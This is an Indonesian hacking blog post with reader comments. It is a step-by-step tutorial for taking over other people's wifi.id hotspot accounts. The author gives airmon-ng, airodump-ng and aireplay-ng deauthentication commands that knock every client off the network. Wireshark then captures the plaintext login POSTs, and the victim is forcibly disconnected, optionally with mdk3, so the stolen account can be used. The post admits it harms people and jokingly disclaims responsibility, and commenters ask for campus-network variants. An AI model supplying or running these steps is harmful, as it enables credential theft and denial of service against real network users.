• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Mendapatkan Username Dan Password Wifi.ID Dengan Wireshark

April 4, 2016 by Jack Wilder 24 Comments

Beberapa waktu yang lalu saya pernah share cara untuk mendapatkan akses wifi.id gratis dengan cara kloning mac address ke pc target lang sudah login ke wifi.id sebelumnya. Nah, kali ini saya mencoba hal yang lebih “ekstrim” , mengambil paksa akun wifi.id milik orang lain, dan memaksa nya logout agar kita bisa login dengan akun miliknya.

Sebagai catatan, cara ini sangat tidak dianjurkan, karena ini termasuk sangat merugikan.

Pertama, pastikan kalian sudah konek ssid @wifi.id . Tidak perlu login, cukup konek kan saja.
Selanjutnya, buka terminal, lalu masukkan command berikut :

sudo airmon-ng start wlan0

Karena disitu ada notice enable on mon1 , maka masukkan command 

sudo airodump-ng mon1

Untuk interface silahkan sesuaikan sendiri, kadang bsia mon0, atau mon1.
Lalu stop dengan menekan ctrl +c .
Selanjutnya masukkan command :

sudo airodump-ng –bssid 6C:99:89:8B:4B:50 mon1

BSSID yang dimasukkan adalah BSSID milik @wifi.id . Silahkan sesuaikan sendiri.
Lalu buka tab terminal baru. Kita open wireshark sebagai root user dengan command :

sudo wireshark

Nah, karena tadi mode monitor yang aktif mon1, maka kita pilih mon1, lalu klik start.

 Masukkan filter http.request.method==POST , lalu apply.

Biarkan wireshark berjalan, sekarang kita hajar access point wifi.id nya.

aireplay-ng –deauth 190 -a 6C:99:89:8B:4B:50 –ignore-negative-one mon1

6C:99:89:8B:4B:50 adalah bssid milik wifi.id . silahkan sesuaikan. 
Command diatas akan melakukan deauth pada semua client yang terhubung ke wifi.id, dan memaksa mereka untuk login ulang.

Sekarang tunggu di wireshark nya. Nunggu ada yang login ke wifi.id lagi.

Yep, dapet korban.

Yep, kita sudah dapet user sama password nya, tapi berhubung doi masih login ke wifi.id , jadi pass sama user tadi percuma.
Sekarang saat nya kita kill koneksi doi biar logout dari wifi.id.

aireplay-ng –deauth 190 -a 6C:99:89:8B:4B:50 -c 94:35:0A:32:52:D8 –ignore-negative-one mon1

sama dengan yang diatas, hanya saja disini kita tambahkan client mac address nya sehingga lebih spesifik.
Setelah selesai, bisa juga di kill dengan mdk3, biar si doi putus asa ga bisa konek, terus pulang deh 😀 .
Nah baru user sama password hasil curian tadi kita pake.

Oke sekian dulu tutorial kali ini, semoga bermanfaat. Sekali lagi, segala bentuk kriminal bukan tanggung jawab ane. 😀

Thanks to darkc0d3

Kalo mau copas credit ke linuxsec njing.

Filed Under: Uncategorized Tagged With: Hacking, Linux, Wireless

Reader Interactions

Comments

  1. Ami Abdul Jabar says

    April 24, 2016 at 2:27 am

    min apakah ini bisa di semua linux ?

    Reply
    • chiaki says

      April 24, 2016 at 9:21 am

      bisa asal ada tools nya

      Reply
    • M Fatony Yudistira says

      April 27, 2016 at 9:22 am

      toolsnya namanya apa ya bang?

      Reply
    • chiaki says

      April 28, 2016 at 3:49 am

      wireshark nak. baca artikel nya

      Reply
  2. l04d1ng_ darkc0d3 says

    May 9, 2016 at 6:25 am

    ini tutor saya ya om 😀 pernah saya share di kali linux indonesia dan backbox indonesia
    my nick darkc0d3
    thanks mas jack udah di di jadikan postingan di linuxsec
    dan saya berterimakasi juga kepada h3d4s h3xor yg ikut bantu saya

    Reply
    • Indra Matsunaga says

      May 21, 2016 at 2:59 am

      mantafff

      Reply
  3. Pemakan Wortel says

    May 25, 2016 at 4:30 pm

    wah ntep, capture sejenis able&chain

    Reply
  4. Carolus Gaza says

    June 12, 2016 at 7:47 am

    Kalau hotspot lain yang loginnya pake secure connection https gimana? Kan pasti ke encrypt tuh datanya.

    Reply
  5. Wilman says

    August 21, 2016 at 2:42 am

    Thanks ya udah ngasih tutorialnya

    Reply
  6. Poetralesana says

    October 15, 2016 at 7:50 pm

    haha . lucu bgd pas penutupan artikelnya 😀

    Reply
  7. MD VK says

    November 8, 2016 at 5:59 pm

    coba pake cara ini , lebih mudah , 2 step 😀

    https://www.youtube.com/watch?v=LFw0cg1E8iY

    Reply
    • chiaki says

      November 23, 2016 at 10:27 pm

      useless . kamu mau pamer apa bikin tutor. show off tool gak dilampirin

      Reply
    • 4YEX says

      January 15, 2018 at 11:18 am

      Pamer!

      Reply
  8. De Uli says

    November 11, 2016 at 3:23 am

    Om bagi method untuk wifi wifi kampus donk. Td nyoba wifi dikampus. Tp kyknya methodnya gak tepat.

    Reply
    • chiaki says

      November 23, 2016 at 10:22 pm

      security nya jenis apa mas

      Reply
  9. enor irfan says

    November 17, 2016 at 2:48 am

    mas bagi ilmu caranya registrasi add on indihome seamless beda line dong. skrg lagi marak aku cari2 gak ktemu ????

    Reply
    • chiaki says

      November 23, 2016 at 10:23 pm

      ane gak pake indihome gan jd sorry banget gak bisa praktek juga

      Reply
  10. Unknown says

    December 14, 2016 at 4:11 pm

    semuanya bisa di coba di windows 7/8 engga min?

    Reply
  11. Mahyarul Hayat says

    March 17, 2017 at 4:16 am

    numpang tanya min, BSSID wifi id nya berubah2 yaa??
    Gmana cara lihat BBSID di tempat kita Conect??
    thanks

    Reply
  12. ramdhan firmansyah says

    April 13, 2017 at 10:26 am

    om ini sejenis man in the midle yah?.

    Reply
    • chiaki says

      April 20, 2017 at 2:29 am

      yup

      Reply
  13. Andi Hakim says

    May 14, 2017 at 10:03 am

    min kalau ini kan ssid wifi.id 6C:99:89:8B:4B:50
    kalau yang ini apa min? -c 94:35:0A:32:52:D8

    Reply
  14. xavier says

    January 2, 2018 at 11:25 am

    min, mau tanya pas step yang di wireshark : ” http.request.method==POST ” ini dah pasti ada (ketemu pencariannya) di wireshark ?
    Soalnya, saya pernah coba dan saya cari ” http.request.method==POST ” nggak ada, saya juga cari ” POST ” juga nggak ada, yang ada pas saya searching malah traffic jaringan di komputer saya sendiri, bukan traffic orang2 yg terhubung di @wifi id
    Penyebab kayak gitu apa min?
    Makasih sebelumnya 😀

    Reply
  15. Friend says

    October 20, 2018 at 7:49 pm

    Bang pake windows bisa ngak?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

MyBB 1.8.x SQL Injection Auto Exploit

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

MIME Type Sniffing pada Form Upload Gambar

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Exploit WPStore Themes Upload Vulnerability

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

LinuxSec / 13 queries in 0.13 seconds